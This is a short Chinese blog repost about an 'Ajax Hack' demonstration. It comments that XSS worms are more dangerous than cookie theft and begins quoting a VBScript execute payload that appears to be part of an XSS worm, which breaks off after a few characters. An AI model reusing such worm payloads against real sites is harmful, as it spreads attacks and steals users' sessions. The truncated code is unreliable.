一个有趣的Ajax Hack示范
2017-02-06
49
今天在梦之光芒的BLOG上看见了一个AjaxHack示范,其实跨站发现很容易,但是要做到大危害还是很难,偷偷COOKIE什么的只针对用户而已,XSSWORM的那种利用才是可怕的。 来看看他的一段VBSCRIPT脚本 复制代码 代码如下:vbscript:execute(" diml,s: l=chr(13)+chr(10): s=""submycode""&l: s=s&""dimhttp,url,pg,p,p2,cd,ht,o""&l: s=s&""ur...